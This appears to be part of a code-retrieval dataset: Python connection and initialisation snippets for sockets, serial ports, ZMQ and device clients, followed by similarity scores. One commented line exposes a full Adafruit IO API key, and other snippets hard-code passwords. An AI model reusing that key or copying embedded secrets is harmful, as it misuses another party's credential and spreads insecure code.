"def initialize(self):\n LOGGER.info('Set %d initializing...', self.port_set)\n # There is a race condition here with ovs assigning ports, so wait a bit.\n time.sleep(2)\n shutil.rmtree(self.tmpdir, ignore_errors=True)\n networking_name = 'gw%02d' % self.port_set\n networking_port = self.pri_base + self.NETWORKING_OFFSET\n LOGGER.debug(\"Adding networking host on port %d\", networking_port)\n cls = docker_host.make_docker_host('daq/networking', prefix='daq', network='bridge')\n try:\n self.networking = self.runner.add_host(networking_name, port=networking_port,\n cls=cls, tmpdir=self.tmpdir)\n self._create_config(self.networking.tmpdir)\n self.record_result('startup')\n except Exception as e:\n self._state_transition(_STATE.ERROR)\n self.record_result('startup', exception=e)",
"def connect(self):\n\n self.openstack = connection.Connection(auth_url=self.args.OS_AUTH_URL,\n project_name=self.args.OS_TENANT,\n username=self.args.OS_USER,\n password=self.args.OS_PASS)\n\n self.scaleio = SIOWrapper(self.args.SIO_GATEWAY,\n self.args.SIO_PORT,\n self.args.SIO_USER,\n self.args.SIO_PASS)",
"def init_host(self, host):\n LOG.debug(\"init_host\")",
"def __init__(self,\n host,\n username,\n password,\n port=443,\n path='/wsman',\n protocol='https'):\n super(DRACClient, self).__init__(host,\n username,\n password,\n port,\n path,\n protocol)\n self._job_mgmt = job.JobManagement(self.client)\n self._idrac_cfg = idrac_card.iDRACCardConfiguration(self.client)\n self._nic_cfg = nic.NICConfiguration(self.client)\n self._nic_mgmt = nic.NICManagement(self.client)",
"def __init__(self, proj,LocalIP,ListenerPort,BroadcasterIP,BroadcasterPort):\n\n\n # Get connection settings from robot configuration file\n ipIn = LocalIP # IP address (string)\n portIn = ListenerPort # Port (number)\n ipOut = BroadcasterIP # IP address (string)\n portOut = BroadcasterPort # Port (number)\n try:\n # Create proxies to access modules\n self.robocomm = _RobotCommunicator()\n self.robocomm.start()\n time.sleep(1) # Give communicator time to start and receive first data\n except RuntimeError:\n print \"(INIT) ERROR: Cannot connect to the robot.\"\n exit(-1)",
"def connect(self):\n self.sock = s.socket(s.AF_INET,s.SOCK_STREAM)\n self.sock.connect((self.remote_host,\n self.remote_port))",
"def __init__(self, ip, port, header):\n \n self.header = header\n self.ip = ip\n self.port = port\n try:\n self._connect_socket()\n except socket.error as e:\n print(e)\n self.close_and_exit()",
"def __init__(self):\n self._process = None\n self._nm = PortScanner()",
"def _connect(self):\n #print(\"Connecting...\")\n self._connection = reactor.connectTCP(self.host, self.port, self.factory) #@UndefinedVariable",
"def connect(self):\n print(\"Connecting\")\n self.socket.connect((self.ip, self.port))\n self.startReading()",
"def __init__(self, host, port, driver, connection_string, password=\"\", use_ssl=False):\n self._socket = socket.create_connection((host, port))\n if use_ssl:\n self._socket = ssl.wrap_socket(self._socket)\n\n self._pass = password\n self._driver = driver\n self._connection_string = connection_string\n self._id = 1",
"def connect(self):\n self.conn.connect()",
"def __init__(self, PORT):\n self.server.bind(('0.0.0.0', PORT))\n self.server.listen(10000)\n self.clients = []\n self.rooms = []\n self.aceptarClientes = True",
"def init(self, HOST, PORT, BACKLOG):\n s = socket(AF_INET, SOCK_STREAM)\n s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n #s.setblocking(0)\n s.bind((HOST, PORT))\n s.listen(BACKLOG)\n # Add socket to list of available inputs\n self.server = s\n self.inputs.append(s)\n self.log(\"Bound socket to port: %s\", PORT)\n self.log(\"Sequence initialized to: %s\", self.seqNum)",
"def __init__(self):\n super().__init__()\n self.port_end = PortTerminator()",
"def init(self):\n\n pygame.init()\n pygame.display.set_mode((640, 480))\n pygame.display.set_caption(\"Gears 4 Geeks\")\n pygame.joystick.init()\n self.controller = pygame.joystick.Joystick(0)\n self.controller.init()\n self.ser = serial.Serial('COM4', 9600)\n\n #ADAFRUIT_IO_KEY = 'd1a1bd3737714fa488e0364c775a4b4d' ##This will only be good until the end of the competition\n #self.aio = Client(ADAFRUIT_IO_KEY)",
"def __init__(self, worker_id=0,\n base_port=5005):\n self.port = base_port + worker_id\n self.worker_id = worker_id\n self.server = None\n self.unity_to_external = None\n self.is_open = False",
"def _setup_communication(self):\n state = self.ui.checkBox_comm.checkState()\n if state:\n try:\n sys.path.append(\"..\")\n from zmq_interface.gui_interface import ZmqInterface\n except ImportError as e:\n self.write_text(\"ZMQ interface failed to import. No remote control for this session.\")\n self.disable_visualizer()\n return\n try:\n ##TODO: let user specify ports\n self.com = ZmqInterface(rep_port=REPLY_PORT,\n gui_handle=self)\n except Exception as e:\n #traceback.print_exc(file=sys.stdout)\n self.write_text(\"ZMQ interface failed to start. No remote control for this session. Reason: %s\" % e)\n self.disable_visualizer()\n return\n self.start = self._start_session\n self.stop = self._stop_session\n self.load_config = self._load_state\n self.save_config = self._save_state\n self.com_timer = QtCore.QTimer()\n self.com_timer.timeout.connect(self._check_coms)\n self.com_timer.start(200)\n self.write_text(\"ZMQ interface set up. Reply port on %s\" % self.com.rep_port)\n self.enable_visualizer()\n else:\n if self.com:\n self.com.close()\n if self.com_timer:\n self.com_timer.stop()\n self.com = None\n self.com_timer = None\n self.enable_visualizer()\n self.write_text(\"ZMQ interface closed.\")",
"def connect(self):\n logging.info(\"Cam.py: connecting components\")\n self.serv = pyrs.Service()\n self.dev = self.serv.Device(device_id=0, \n streams=[\\\n pyrs.stream.DepthStream(fps=60), pyrs.stream.ColorStream(fps=60)])",
"def __init__(self, connectionParams) :\n self.ssh = None\n self.connected = False\n self.connObj = connectionParams",
"def connect(self):\n \n try:\n self.__sock.connect((self.__host, self.__port))\n\n except socket.error,e:\n print 'Oops, unable to connect. Try again!',e\n sys.exit(1)",
"def __init__(self, ip, port):\n hwEscpos.EscposDriver.__init__(self)\n self.ip = ip\n self.port = int(port)",
"def connect(self):\n # open serial port\n try:\n #device = self.get_device_name(self.serial_number)\n device = \"/dev/ttyAMA0\"\n self.serial.port = device\n # Set RTS line to low logic level\n self.serial.rts = False\n self.serial.open()\n except Exception as ex:\n self.handle_serial_error(ex)",
"def init_box():\n # Find MAC and IP address\n ip_address = ni.ifaddresses(INTERFACE)[ni.AF_INET][0]['addr']\n mac_address = ni.ifaddresses(INTERFACE)[ni.AF_LINK][0]['addr']\n conn_results = utils.test_connections()\n logging.info(\"Connection test results: %s \\n\", str(conn_results))\n start_port, free_ports = utils.connection_results_2_free_ports(conn_results)\n resp, err = call_init(mac_address, ip_address, start_port, free_ports)\n if err:\n logging.error(\"Failed to connect to SCION-COORD server: \\n %s \\n\",err)\n exit(1)\n elif resp.status_code == 200:\n if resp.headers['content-type'] == 'application/json; charset=utf-8':\n # We have received the list of potential neighbors\n dict = json.loads(resp.content.decode('utf8').replace(\"'\", '\"'))\n utils.save_credentials(dict)\n logging.info(\"Received list of potential neighbors and credentials from SCION-COORD: %s \", str(dict))\n if not dict[\"PotentialNeighbors\"]:\n logging.info(\"no potential Neighbors !\")\n exit(1)\n connection_results = test_links(dict[\"PotentialNeighbors\"])\n dict[\"PotentialNeighbors\"] = connection_results\n connect_box(dict)\n elif resp.headers['content-type'] == 'application/gzip':\n logging.info(\"Received gen folder \")\n utils.parse_response(resp)\n logging.info(\"Starting SCION !\")\n utils.start_scion()\n else:\n # Received something else\n # TODO UPDATE ?\n pass\n else:\n logging.error(\"[ERROR] Wrong status code %s\", resp.status_code)\n exit(1)",
"def init(self):\n self.reset()\n\n self.__interface.send_command('POWER_SETTING')\n self.__interface.send_data(0x37)\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('PANEL_SETTING')\n self.__interface.send_data(0xCF)\n self.__interface.send_data(0x08)\n\n self.__interface.send_command('BOOSTER_SOFT_START')\n self.__interface.send_data(0xc7)\n self.__interface.send_data(0xcc)\n self.__interface.send_data(0x28)\n\n self.__interface.send_command('POWER_ON')\n self.wait_until_idle()\n\n self.__interface.send_command('PLL_CONTROL')\n self.__interface.send_data(0x3c)\n\n self.__interface.send_command('TEMPERATURE_CALIBRATION')\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('VCOM_AND_DATA_INTERVAL_SETTING')\n self.__interface.send_data(0x77)\n\n self.__interface.send_command('TCON_SETTING')\n self.__interface.send_data(0x22)\n\n self.__interface.send_command('TCON_RESOLUTION')\n self.__interface.send_data(0x02) #source 640\n self.__interface.send_data(0x80)\n self.__interface.send_data(0x01) #gate 384\n self.__interface.send_data(0x80)\n\n self.__interface.send_command('VCM_DC_SETTING')\n self.__interface.send_data(0x1E) #decide by LUT file\n\n self.__interface.send_command(0xe5, False) #FLASH MODE\n self.__interface.send_data(0x03)",
"def init(self, address, port):\n \n pygame.init()\n pygame.joystick.init()\n self.controller = pygame.joystick.Joystick(0)\n self.controller.init()\n self.event_dict = {}\n\n # Create a TCP/IP socket\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Connect the socket to the port where the server is listening\n server_address = (address, port)\n print('connecting to {} port {}'.format(address, port))\n self.sock.connect(server_address)\n self.axis_data = {i:0 for i in range(7)}\n self.verbose = True",
"def createConnectionToCli(self):\n connected = False\n # loop until connected\n while not connected:\n try:\n self.dataClient = Client(\n ('localhost', 5000), authkey=b'secret password')\n connected = True\n except ConnectionRefusedError:\n pass\n\n self.logger.debug('Connected to Process!')",
"def __init__(self, address=\"lex\", port=8000, **kwargs):\n self.connect(address, port)",
"def connect(self):\n self.socket.connect(f'tcp://{self.ip}:{self.port}')\n self.socket.send_string('PUB_PORT')\n self.pub_port = self.socket.recv_string()\n self.pub_socket = zmq.Socket(self.ctx, zmq.PUB)\n self.pub_socket.connect(f\"tcp://{self.ip}:{self.pub_port}\")",
"def init(self):\n self.AOMBoxConnection = pyArdDAC.ARD_DAC(HOST=self.AOMBox_IP, PORT=8888, DEBUG=False)#connects to arduino in High frequency Na AOM box\n #channel number should be defined in subclass\n self.INTEGER_MIN = 0\n self.INTEGER_MAX = 65535\n self.VOLTAGE_MIN = 0.0\n self.VOLTAGE_MAX = 5.0\n self.initialised=True\n return \"%s init successful\" % self.hardwareActionName",
"def __init__(self, ip, port):\n self.port = port\n self.srvsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.srvsock.connect((ip, port))\n self.thread_receive = threading.Thread(target=self.receive_msg)\n self.thread_send = threading.Thread(target=self.send_msg)\n self.t = blessings.Terminal()\n self.th = self.t.height\n self.tw = self.t.width\n self.k = 1\n self.flag = True\n os.system('clear')",
"def _connect(self):\n hostport = self.getHost()\n channelOpenData = forwarding.packOpen_direct_tcpip((self.host, self.port), (hostport.host, hostport.port))\n self.connector.connection.openChannel(self, channelOpenData)",
"def connect(self):\n from labrad.wrappers import connectAsync\n self.cxn = yield connectAsync(name='Protection_Beam_Server')\n self.arduino = self.cxn.arduinottl\n self.pmt = self.cxn.normalpmtflow\n self.enable_protection_shutter(self, self.enable_shutter)\n self.setupListeners()",
"def __init__(self, port1, port2, port3):\n # Initialise ports\n self.ports = {\n \"English\": int(port1),\n \"Te reo Maori\": int(port2),\n \"German\": int(port3)\n }\n\n # Initialise sockets\n self.english_sc = None\n self.maori_sc = None\n self.german_sc = None",
"def init_serial(instrument):\r\n\t# open a serial port\r\n\ttry:\r\n\t\tser = serial.Serial(instrument['port']) # try and open th serial port\r\n\texcept:\r\n\t\tser = serial.Serial() # make an empty serial port object if not\r\n\t# display serial port status\r\n\tprint_spacer()\r\n\tif ser.isOpen()==True:\r\n\t print 'Serial port '+instrument['port']+ ' has been opened.'\r\n\telse:\r\n\t print 'Serial port '+instrument['port']+' failed to open.'\t\t# set up the parameters\r\n\t# set up the serial port parameters\r\n\tser.baudrate = instrument['baudrate'] # set the baudrate\r\n\tser.bytesize = instrument['bytesize'] # \r\n\tser.parity = instrument['parity'] # \r\n\tser.stopbits = instrument['stopbits'] # \r\n\tser.timeout = instrument['timeout'] # specify a timeout (in seconds) so the port doesn't hang\r\n\tser.xonxoff = instrument['xonxoff'] # \r\n\tser.rtscts = instrument['rtscts'] # \r\n\tser.dsrdtr = instrument['dsrdtr'] # \r\n\t#return the serial port back to the caller\r\n\treturn ser",
"def __init__(self, host: str, username: str, password: str, secret=\"\", port=22, **kwargs): # nosec\n super().__init__(host, username, password, device_type=\"cisco_asa_ssh\")\n\n self.native: Optional[CiscoAsaSSH] = None\n self.secret = secret\n self.port = int(port)\n self.kwargs = kwargs\n self.global_delay_factor: int = kwargs.get(\"global_delay_factor\", 1)\n self.delay_factor: int = kwargs.get(\"delay_factor\", 1)\n self._connected = False\n self.open()\n self._peer_device: Optional[ASADevice] = None\n log.init(host=host)",
"def __init__(self,\n host_name='127.0.0.1',\n port=ControlServer.CONTROL_PORT):\n\n self._socket = QtNetwork.QTcpSocket()\n self._socket.connected.connect(self._connected)\n self._socket.disconnected.connect(self._disconnected)\n self.connected = False\n self._socket.connectToHost(host_name, port)",
"def initialize_socket(self):\n try:\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.sock.bind((self.host, self.port))\n self.sock.listen(10)\n except socket.error, (value, message):\n if self.sock:\n self.sock.close()\n # TODO: LOG and provide means for graceful failure\n print \"Unable to open socket: \" + message\n print \"Error value: \" + str(value)",
"def _initRemoteMDSConnection(shotno):\n\tconn = _mds.Connection(_pref._HBT_SERVER_ADDRESS+':8003');\n\tconn.openTree('hbtep2', shotno);\n\treturn conn",
"def __init__(self, creator_socket):\n self.__socket = creator_socket\n logger.info(BUNDY_SOCKCREATOR_INIT)",
"def connect(self):\n self.arduino = Serial(self.port, self.baud_rate, timeout=self.timeout)",
"def _connect(self):\n try:\n #print(\"try to connect _connect\")\n sock = gevent.socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect(self.remote_address)\n except socket.error as error:\n logger.warning(\"Couldn't connect to %s: %s.\",\n self._repr_remote(), error)\n else:\n self.initialize(sock, self.remote_service_coord)",
"def __init__(self,address = None):\n\t\t# I really should do some validation around here\n\t\n\t\tif address != None:\n\t\t\tself.connect(address)"
] | [
"0.68135244",
"0.6722893",
"0.6576823",
"0.6545895",
"0.644708",
"0.6422418",
"0.63781244",
"0.6336236",
"0.632813",
"0.6293881",
"0.6287817",
"0.6272204",
"0.6263622",
"0.6260987",
"0.62608707",
"0.6248125",
"0.6230067",
"0.6226806",
"0.6222727",
"0.6207892",
"0.6204479",
"0.6199098",
"0.61818177",
"0.6169914",
"0.6168168",
"0.61630803",
"0.6162961",
"0.61409026",
"0.6126866",
"0.6112256",
"0.61062515",
"0.6073524",
"0.60677",
"0.6061262",
"0.6059762",
"0.6028337",
"0.6024558",
"0.60215425",
"0.601498",
"0.6010289",
"0.60101825",
"0.59934336",
"0.59854686",
"0.5985429",
"0.5985429",
"0.59851086",
"0.598078",
"0.59786874",
"0.5978631",
"0.59782356",
"0.5976034",
"0.5973603",
"0.5973603",
"0.59727514",
"0.5968348",
"0.5967893",
"0.59605783",
"0.59595907",
"0.5958674",
"0.59520376",
"0.59488255",
"0.5939047",
"0.59375226",
"0.59254676",
"0.5925427",
"0.5918987",
"0.59153044",
"0.591378",
"0.59050053",
"0.5903733",
"0.5897043",
"0.5893201",
"0.58861524",
"0.5883788",
"0.58821064",
"0.5875777",
"0.5872845",
"0.5863558",
"0.5859377",
"0.5856732",
"0.5855701",
"0.58420295",
"0.5839088",
"0.58371043",
"0.5827849",
"0.5826972",
"0.58252144",
"0.5824248",
"0.5821275",
"0.58201504",
"0.58197594",
"0.5818745",
"0.5811872",
"0.5810854",
"0.58096266",
"0.580762",
"0.58065015",
"0.5806096",
"0.5806047",
"0.5805189",
"0.58035564"
] | 0.0 | -1 |
ready_for_commands is a function to wait for the firmware to be ready to communicate | def ready_for_commands(self, retries = 3):
while retries:
try:
self.refresh()
return True
except Reset_Exception as e:
pass
except Max_Retry_Exception as e:
pass
finally:
retries -= 1
raise e | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _wait_ready(self):\n command = self._recv_from_client()\n while command != \"READY\":\n command = self._client.recv_from_client()",
"def waitonready(self):\n debug('ControllerStartup.waitonready()')\n waitonready(self.pidevice, **self._kwargs)",
"def waitonready(pidevice, timeout=300, predelay=0, polldelay=0.1):\n if not isdeviceavailable([GCS2Commands, GCS21Commands], pidevice):\n raise TypeError('Type %s of pidevice is not supported!' % type(pidevice).__name__)\n\n sleep(predelay)\n if not pidevice.HasIsControllerReady():\n return\n maxtime = time() + timeout\n while not pidevice.IsControllerReady():\n if time() > maxtime:\n raise SystemError('waitonready() timed out after %.1f seconds' % timeout)\n sleep(polldelay)\n pidevice.checkerror()",
"def _wait_for_ready(self):\n if not self._ready:\n self.expect(self._terminal_ready_str, timeout=15)\n self._ready = True\n return self",
"def wait_until_ready(self):\n while not self.is_ready():\n time.sleep(0.01)",
"def run_setup_commands(self):\n if not hasattr(self, 'commands') or not self.commands:\n return\n print('{GREEN}Running setup commands...{NC}'.format(**colors))\n for c in self.commands:\n self.mqtt.connect(self.mqtt_host)\n command = \"{c_topic}/{cmnd}\".format(**self, cmnd=c['command'])\n payload = ''\n if 'concat' in c: #It's a set of rules; so do fancy shit\n payload = ' '.join(c['concat'])\n else: #payload is the correct thing\n payload=c['payload']\n print(\"Sending {c} {p}\".format(c=command, p=payload))\n self.mqtt.publish(command, payload)\n self.mqtt.disconnect()\n sleep(1)\n if \"restart\" in c and c['restart'] == 1:\n self.online_check()",
"async def wait_until_ready(self):\n await self._ready.wait()",
"def check_commands(self):\n self.check_subsystem_commands()\n self._select_mode()",
"def wait_all_ml_ready():\n ready_dict = recv_from_all_ml(to_wait = False)\n\n # Wait the ready command one by one\n for ml_process, received_msg in ready_dict.items():\n while received_msg != \"READY\":\n received_msg = recv_from_ml(ml_process, to_wait = True)",
"async def wait_until_ready(self) -> None:\n await self._ready.wait()",
"def wait_to_be_ready(self):\n count = 0\n while count < 6:\n try:\n line = self.stdout_reader.get(timeout=10)\n if \"waiting for input\" in line:\n self.cec_logger.info('CEC is ready')\n break\n except Empty:\n self.cec_logger.warning(\"haven't received a line from CEC\")\n count += 3",
"def check_subsystem_commands(self):\n self.communications.check_controls()\n self.__check_video()\n self.__check_picture()\n self.__check_ping()\n self.__check_motion()",
"def on(self):\n\t\trb0 = [0x00]\n\t\trb1 = [0x00, 0x00]\n\t\tattempts = 0\n\n\t\twhile self.state != ON and attempts < MAX_RETRIES:\n\t\t\tself.spi.transfer([0x03], rb0, 1)\t\t## Send the command byte; response will be written to rb0\n\t\t\ttime.sleep(9e-3) \t\t\t\t\t\t## Sleep for 9 ms\n\t\t\tself.spi.transfer([0x00, 0x01], rb1, 2)\t## Send the following 2 bytes; response will be written to rb1\n\t\t\ttime.sleep(0.1)\n\n\t\t\tif rb0[0] < 0: \t\t\t\t\t\t## Account for implicit unsigned-to-signed \n\t\t\t\trb0[0] += 256\t\t\t\t\t## conversion from the transfer operation\n\n\t\t\tattempts += 1\n\t\t\tprint(f\"[{self.__class__.__name__}::on]\", end=' ')\n\t\t\tif rb0[0] == 0xF3 and rb1[0] == 0x03: \t## Ensure response values are as expected\n\t\t\t\tself.state = ON \n\t\t\t\tprint(\"SUCCESS -- device powered on.\")\n\t\t\telse:\n\t\t\t\tif attempts != MAX_RETRIES:\n\t\t\t\t\tprint(f\"Attempt #{attempts} failed -- retrying after delay ...\")\n\t\t\t\t\ttime.sleep(RETRY_DELAY)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ERROR -- command failed.\")\n\n\t\treturn self.state == ON",
"def get_wait_for_platform_ready_args(self,comArgs):\n params, flags = self.get_params(comArgs)\n tool = params.get('T') \n delay = 100\n timeout = params.get('P', 60)\n args = [tool, delay, timeout] \n return args",
"def waitReady(self, spin_delay=0.01):\n while not self.isReady():\n time.sleep(spin_delay)",
"def check_commands(self):\n pass",
"def do_ready(self) -> bool:\n logger.info('Device ' + self.name + ' is ready.')\n return False",
"async def on_ready():\n print('We have logged in as {0.user}'.format(client))\n global command_dictionary\n command_dictionary = get_setting_commands()",
"def test_device_command_list(self):\n actual_device_commands = set(self.sim_device.get_command_list()) - {\"Init\"}\n expected_command_list = set(\n self.sim_file_parser.get_device_command_metadata().keys()\n )\n self.assertEquals(\n actual_device_commands,\n expected_command_list,\n \"The commands specified are not present in the device\",\n )",
"def wait_until_arduino_ready():\n print(\"waiting for Ardunio to reset...\")\n\n msg = serial_port.readline().decode(\"utf-8\")\n\n while msg.find(\"Arduino is ready\") == -1:\n msg = serial_port.readline().decode(\"utf-8\")",
"def __wait_for(self, cmd_byte, rx_bytes, timeout_seconds=1.0):\n if not self.is_valid():\n return False\n t = time.time()\n remain = timeout_seconds\n while 1:\n #num_read = self.__usb_if.MPUSBRead(self.__handle_read, rx_bytes, int(remain*1000))\n #if (num_read > 0) and (rx_bytes[0]==cmd_byte):\n # return True\n rx = self.__usb_if.read(int(remain*1000))\n num_read = len(rx)\n if rx:\n rx_bytes[:] = rx\n if (num_read > 0) and (rx_bytes[0]==cmd_byte):\n return True\n remain = timeout_seconds - (time.time()-t)\n if remain <= 0:\n break\n time.sleep(0.001)\n #end 1 loop\n return False\n #end __wait_for()",
"def waitInit(client, userdata, command):\n print('User was accepted')\n\n with open(PATH_TO_USERS) as file:\n readData = json.load(file)\n \n message = {\n \"device_id\" : DEVICENAME, \"admin_list\" : []\n }\n message['admin_list'] = readData['admin_list']\n client.publish(doorUnlockedTopic, json.dumps(message), 1)",
"def check_all_systems_ready(self):\n joint_states_msg = None\n while joint_states_msg is None and not rospy.is_shutdown():\n try:\n joint_states_msg = rospy.wait_for_message(\"/joint_states\", JointState, timeout=0.1)\n self.joints_state = joint_states_msg\n rospy.logdebug(\"Current joint_states READY\")\n except Exception as e:\n self._ctrl_conn.start_controllers(controllers_on=\"joint_state_controller\") \n rospy.logdebug(\"Current joint_states not ready yet, retrying==>\"+str(e))\n\n rospy.logdebug(\"ALL SYSTEMS READY\")",
"def callback(new_commands):\n global motor_commands\n rospy.loginfo(\"Received command. Simulating...\")\n print(new_commands.data)\n\n # print(new_commands)\n new_angles = np.asarray(new_commands.data[0:4])\n new_angles = np.clip(new_angles, a_min=[M1_MIN, M2_MIN, M3_MIN, M4_MIN], a_max=[M1_MAX, M2_MAX, M3_MAX, M4_MAX])\n\n motor_commands[0, 2] = new_angles[0] * 1 # originally -1\n motor_commands[1, 2] = new_angles[1] * 1 # originally -1\n motor_commands[2, 2] = new_angles[2] * 1 # originally -PULLEY_RATIO\n motor_commands[3, 2] = new_angles[3] * 1 # originally -1\n\n motor_commands = ramp_to_pos(motor_commands)\n motor_commands[:, 1] = motor_commands[:, 2]",
"async def run_command(device, command):\n print(\"Waiting for button presses ...\")\n async for event in device.async_read_loop():\n if EV_KEY == event.type:\n key_event = evdev.KeyEvent(event)\n if evdev.KeyEvent.key_down == key_event.keystate:\n os.system(command)",
"def _check_all_systems_ready(self):\n raise NotImplementedError()",
"def _get_supported_commands(self):\n logger.info(\"Default unconfigured API, not adding any commands!\")\n pass",
"async def async_execute_command(self, command, notif):\n if command.startswith('MCU'):\n value = await self.async_call_linkplay_tcpuart(command)\n elif command == 'Reboot':\n value = await self.async_call_linkplay_httpapi(\"getStatus:ip:;reboot;\", None)\n elif command == 'PromptEnable':\n value = await self.async_call_linkplay_httpapi(\"PromptEnable\", None)\n elif command == 'PromptDisable':\n value = await self.async_call_linkplay_httpapi(\"PromptDisable\", None)\n elif command == 'RouterMultiroomEnable':\n value = await self.async_call_linkplay_httpapi(\"setMultiroomLogic:1\", None)\n elif command == 'SetRandomWifiKey':\n from random import choice\n from string import ascii_letters\n newkey = (''.join(choice(ascii_letters) for i in range(16)))\n value = await self.async_call_linkplay_httpapi(\"setNetwork:1:{0}\".format(newkey), None)\n if value == 'OK':\n value = value + \", key: \" + newkey\n else:\n value = \"key: \" + newkey\n elif command.startswith('SetApSSIDName:'):\n ssidnam = command.replace('SetApSSIDName:', '').strip()\n if ssidnam != '':\n value = await self.async_call_linkplay_httpapi(\"setSSID:{0}\".format(ssidnam), None)\n if value == 'OK':\n value = value + \", SoftAP SSID set to: \" + ssidnam\n else:\n value == \"SSID not specified correctly. You need 'SetApSSIDName: NewWifiName'\"\n elif command.startswith('WriteDeviceNameToUnit:'):\n devnam = command.replace('WriteDeviceNameToUnit:', '').strip()\n if devnam != '':\n value = await self.async_call_linkplay_httpapi(\"setDeviceName:{0}\".format(devnam), None)\n if value == 'OK':\n self._name = devnam\n value = value + \", name set to: \" + self._name\n else:\n value == \"Device name not specified correctly. You need 'WriteDeviceNameToUnit: My Device Name'\"\n elif command == 'TimeSync':\n import time\n tme = time.strftime('%Y%m%d%H%M%S')\n value = await self.async_call_linkplay_httpapi(\"timeSync:{0}\".format(tme), None)\n if value == 'OK':\n value = value + \", time: \" + tme\n elif command == 'Rescan':\n self._unav_throttle = False\n self._first_update = True\n # await self.async_schedule_update_ha_state(True)\n value = \"Scheduled to Rescan\"\n elif command == 'Update':\n # await self.async_schedule_update_ha_state(True)\n value = \"Scheduled to Update\"\n else:\n value = \"No such command implemented.\"\n _LOGGER.warning(\"Player %s command: %s, result: %s\", self.entity_id, command, value)\n\n _LOGGER.debug(\"Player %s executed command: %s, result: %s\", self.entity_id, command, value)\n\n if notif:\n self.hass.components.persistent_notification.async_create(\"<b>Executed command:</b><br>{0}<br><b>Result:</b><br>{1}\".format(command, value), title=self.entity_id)",
"def plugins_ready():\n\n for plugin in registerorder:\n plugin.ready()",
"def ready():\n\tsh('c')\n\td1out()\n\td2out()\n\td3out()\n\t#marAuxiliary.openMarShield()\t\t# N.b. if mar disconnected, will just do nothing",
"def __init_modules(self) -> None:\n\n BROADCAST_ID = 0xFFF\n\n # Reboot module\n reboot_message = self.__set_module_state(\n BROADCAST_ID, Module.State.REBOOT, Module.State.PNP_OFF\n )\n self._send_q.put(reboot_message)\n # self.__delay()\n\n # Command module pnp off\n pnp_off_message = self.__set_module_state(\n BROADCAST_ID, Module.State.RUN, Module.State.PNP_OFF\n )\n self._send_q.put(pnp_off_message)\n # self.__delay()\n\n # Command module uuid\n request_uuid_message = self.__request_uuid(BROADCAST_ID)\n self._send_q.put(request_uuid_message)\n # self.__delay()\n\n # Request topology data\n self.request_topology()\n # self.__delay()",
"def waitForCompletion(self):\n\n while(json.loads(self.robot.device())['state']!=0):\n time.sleep(0.1)\n continue\n\n return",
"def available_commands(self):\n return self._available_commands",
"def _init_commands(self):\n\t\tself.commands = {}\n\t\tself.log.info(\"Initializing commands...\")\n\t\t# Get all the commands and iterate over them\n\t\tfor command in self.conf_commands:\n\t\t\t\n\t\t\t# Verify the necessary config elements exist at all\n\t\t\tdisabled = command.get('disabled', False) # Disabled is optional, defaults to False\n\t\t\tif(disabled == True):\n\t\t\t\tcontinue;\n\t\t\tcommand_name = command.get('name', \"unknown\").lower()\n\t\t\tdescription = command.get('description', \"\")\n\t\t\tpermission_str = command.get('permission', None)\n\t\t\taction = command.get('action', None)\n\t\t\tmin_votes = command.get('min_votes', None)\n\t\t\targs = command.get('args', None)\n\t\t\taliases = command.get('aliases', None)\n\t\t\tif(command_name is None \n\t\t\t\tor permission_str is None \n\t\t\t\tor action is None \n\t\t\t\tor min_votes is None \n\t\t\t\tor args is None):\n\t\t\t\tself.log.warn(\"Command '{}': Error, missing 'permission', 'action', 'min_votes', or 'args' elements for command \".format(command_name))\n\t\t\t\tcontinue\n\n\t\t\t# Verify the votes and permission string are valid\n\t\t\tif(min_votes < 0):\n\t\t\t\tself.log.warn(\"Command '{}': Error, min_votes cannot be less than zero for command {}\".format(command_name, min_votes))\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tself.log.debug(\"Command '{}': minimum votes is {}\".format(command_name, min_votes))\n\n\t\t\ttry:\n\t\t\t\tpermission = Permission[permission_str]\n\t\t\t\tself.log.debug(\"Command '{}': permission is {}\".format(command_name, permission))\n\t\t\texcept Exception as e:\n\t\t\t\tself.log.warn(\"Command '{}': Error, permission string '{}' is invalid, must be one of: {}\".format(command_name, permission_str, Permission.__members__))\n\t\t\t\tcontinue\n\n\t\t\t# Try to get the corresponding action class\n\t\t\ttry:\n\t\t\t\tmodule = import_module(\"obs.actions.\"+action)\n\t\t\t\tclass_ = getattr(module, action)\n\t\t\t\tself.log.debug(\"Command {}: action is {}\".format(command_name, class_))\n\t\t\texcept Exception as e:\n\t\t\t\tself.log.warn(\"Command '{}': Error, no such action {} is defined. Full error: {}\".format(command_name, action, e))\n\t\t\t\tcontinue\n\n\t\t\t# Try to instantiate the action class\n\t\t\ttry:\n\t\t\t\tself.log.debug(\"Command {}: args are: {}\".format(command_name, args))\n\t\t\t\tcommand_obj = class_(self, command_name, aliases, description, permission, min_votes, args)\n\t\t\texcept ValueError as e:\n\t\t\t\tself.log.warn(e)\n\t\t\t\tcontinue\n\n\t\t\t# Add command_obj to internal reference\n\t\t\tself.commands[command_name] = command_obj\n\n\t\t\t# If there are aliases, add them too\n\t\t\t\n\t\t\tif(not aliases is None and isinstance(aliases, (list,) )):\n\t\t\t\tself.log.debug(\"Command '{}': Found aliases {}\".format(command_name, aliases))\n\t\t\t\tfor alias in aliases:\n\t\t\t\t\tself.commands[alias] = command_obj\n\t\t\telse:\n\t\t\t\tself.log.debug(\"Command '{}': No aliases\".format(command_name, aliases))\n\n\t\t# Finally after all commands have been initialized then add the help command\n\t\t#self.commands['help'] = Help(self)\n\n\t\t# Done initializing\n\t\tself.log.info(\"...Commands initialized: {}\".format(\n\t\t\t\tlist( self.commands.keys()) \n\t\t\t)\n\t\t)",
